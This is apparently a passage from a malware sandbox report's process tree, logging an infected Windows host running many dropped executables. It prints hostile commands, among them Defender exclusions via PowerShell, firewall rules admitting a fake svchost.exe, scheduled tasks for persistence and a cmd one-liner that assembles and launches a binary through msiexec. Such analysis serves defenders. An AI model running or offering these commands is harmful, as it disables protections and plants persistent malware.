C:\Users\Admin\Pictures\Adobe Films\KN7omBZKyBAtLlFJ6MebZ_Z4.exe"C:\Users\Admin\Pictures\Adobe Films\KN7omBZKyBAtLlFJ6MebZ_Z4.exe"4⤵PID:6068
-
-
C:\Users\Admin\Pictures\Adobe Films\VuoZjZPqTt4XuojZoc0PPvnn.exe"C:\Users\Admin\Pictures\Adobe Films\VuoZjZPqTt4XuojZoc0PPvnn.exe"4⤵PID:6124
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=15⤵PID:6576
-
-
-
C:\Users\Admin\Pictures\Adobe Films\y_KHMQ6HXV5SCeXDZtEeWopd.exe"C:\Users\Admin\Pictures\Adobe Films\y_KHMQ6HXV5SCeXDZtEeWopd.exe"4⤵PID:6412
-
C:\Users\Admin\AppData\Local\Temp\is-M61C0.tmp\y_KHMQ6HXV5SCeXDZtEeWopd.tmp"C:\Users\Admin\AppData\Local\Temp\is-M61C0.tmp\y_KHMQ6HXV5SCeXDZtEeWopd.tmp" /SL5="$402A6,506127,422400,C:\Users\Admin\Pictures\Adobe Films\y_KHMQ6HXV5SCeXDZtEeWopd.exe"5⤵PID:6616
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:3308
-
-
-
C:\Users\Admin\Pictures\Adobe Films\nGnLmAuo3H0EjiKQyZVWy7ga.exe"C:\Users\Admin\Pictures\Adobe Films\nGnLmAuo3H0EjiKQyZVWy7ga.exe"2⤵PID:5344
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \3⤵PID:1380
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵PID:2112
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\3⤵PID:4632
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal3⤵PID:5260
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵PID:5944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \4⤵PID:6500
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵PID:6756
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵PID:6596
-
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM3⤵
- Creates scheduled task(s)
PID:4488
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵PID:5432
-
-
-
C:\Users\Admin\Pictures\Adobe Films\OBenNt98aBYk9GwdIWcathF6.exe"C:\Users\Admin\Pictures\Adobe Films\OBenNt98aBYk9GwdIWcathF6.exe"2⤵PID:5408
-
-
C:\Users\Admin\Pictures\Adobe Films\njFI1bLvpSoXabAXzERBXTer.exe"C:\Users\Admin\Pictures\Adobe Films\njFI1bLvpSoXabAXzERBXTer.exe"2⤵PID:3076
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 2923⤵
- Program crash
PID:4652
-
-
-
C:\Users\Admin\Pictures\Adobe Films\6K24cV4WI0TNfxSEwt53e0Iw.exe"C:\Users\Admin\Pictures\Adobe Films\6K24cV4WI0TNfxSEwt53e0Iw.exe"2⤵PID:4968
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 2963⤵
- Program crash
PID:5652
-
-
-
C:\Users\Admin\Pictures\Adobe Films\qF87haFpLC4xpGuujQuU7dvh.exe"C:\Users\Admin\Pictures\Adobe Films\qF87haFpLC4xpGuujQuU7dvh.exe"2⤵PID:5128
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵PID:3312
-
-
-
C:\Users\Admin\Pictures\Adobe Films\i4JGM3lfyYqMv0FV3edqzMRF.exe"C:\Users\Admin\Pictures\Adobe Films\i4JGM3lfyYqMv0FV3edqzMRF.exe"2⤵PID:5156
-
-
C:\Users\Admin\Pictures\Adobe Films\yRrhQ_qNjycivqJ0uFMNTt_2.exe"C:\Users\Admin\Pictures\Adobe Films\yRrhQ_qNjycivqJ0uFMNTt_2.exe"2⤵PID:5192
-
-
C:\Users\Admin\Pictures\Adobe Films\uADyxRpxb732ksRdQzrNr2uW.exe"C:\Users\Admin\Pictures\Adobe Films\uADyxRpxb732ksRdQzrNr2uW.exe"2⤵PID:5404
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=13⤵PID:5548
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3392 -ip 33921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2472
-
C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue16937a015b8e.exe"C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue16937a015b8e.exe" /SILENT1⤵
- Executes dropped EXE
PID:1308 -
C:\Users\Admin\AppData\Local\Temp\is-1FTLK.tmp\Tue16937a015b8e.tmp"C:\Users\Admin\AppData\Local\Temp\is-1FTLK.tmp\Tue16937a015b8e.tmp" /SL5="$90082,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue16937a015b8e.exe" /SILENT2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:932
-
-
C:\Users\Admin\AppData\Local\Temp\is-FVQ8H.tmp\Tue16937a015b8e.tmp"C:\Users\Admin\AppData\Local\Temp\is-FVQ8H.tmp\Tue16937a015b8e.tmp" /SL5="$80082,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue16937a015b8e.exe"1⤵PID:2400
-
C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue1647cedf7bf133.exeTue1647cedf7bf133.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4988
-
C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue1604aa7d34a61a5b.exeTue1604aa7d34a61a5b.exe1⤵
- Executes dropped EXE
PID:2284
-
C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue162f02d7b75a1d.exeTue162f02d7b75a1d.exe1⤵
- Executes dropped EXE
PID:3036 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 2962⤵
- Program crash
PID:5260
-
-
C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue160598ce8b05.exeTue160598ce8b05.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4452
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3324 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:5124
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5124 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5180
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 5124 -ip 51241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5160
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3192 -ip 31921⤵PID:5208
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo N%TIme%O>VPZp.II & EChO | set /p = "MZ" > KL6F.Aa_ &cOpY /y /B kL6F.AA_+LAQIL0YY.POg + vCTGFFAM.2ST+ ip~Q0M_L.i + IfY08H17.9LD + 1cQMG.2 + VpZp.II PUA9.FS & sTaRT msiexec.exe /Y .\pUA9.FS1⤵PID:2764
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO "2⤵PID:1428
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>KL6F.Aa_"2⤵PID:460
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /Y .\pUA9.FS2⤵PID:6024
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3036 -ip 30361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2036
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1304 -ip 13041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2188
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5632 -ip 56321⤵PID:6032
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5648 -ip 56481⤵PID:2864
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"1⤵PID:5804
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5600 -ip 56001⤵PID:5792
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 5640 -ip 56401⤵PID:1076
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5776 -ip 57761⤵PID:1936
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5208 -ip 52081⤵PID:1888
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5220 -ip 52201⤵PID:5352
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 3076 -ip 30761⤵PID:1584
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 5128 -ip 51281⤵PID:3224
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 884 -ip 8841⤵PID:3704
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 5620 -ip 56201⤵PID:4688
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5720 -ip 57201⤵PID:5832
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4968 -ip 49681⤵PID:4524
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1720 -ip 17201⤵PID:5668
-
C:\Users\Admin\AppData\Local\Temp\418E.exeC:\Users\Admin\AppData\Local\Temp\418E.exe1⤵PID:884
-
C:\Users\Admin\AppData\Local\Temp\418E.exeC:\Users\Admin\AppData\Local\Temp\418E.exe2⤵PID:6588
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4488 -ip 44881⤵PID:6740
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4032 -ip 40321⤵PID:6868
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 1904 -ip 19041⤵PID:6908
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:7068 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:6268
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6268 -s 4563⤵
- Program crash
PID:5956
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 6268 -ip 62681⤵PID:5704
-
C:\Users\Admin\AppData\Local\Temp\DEF8.exeC:\Users\Admin\AppData\Local\Temp\DEF8.exe1⤵PID:6664
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6664 -s 2962⤵
- Program crash
PID:2200
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6664 -ip 66641⤵PID:5972
-
C:\Users\Admin\AppData\Local\Temp\F947.exeC:\Users\Admin\AppData\Local\Temp\F947.exe1⤵PID:5868
-
C:\Users\Admin\AppData\Local\Temp\F947.exeC:\Users\Admin\AppData\Local\Temp\F947.exe2⤵PID:5592
-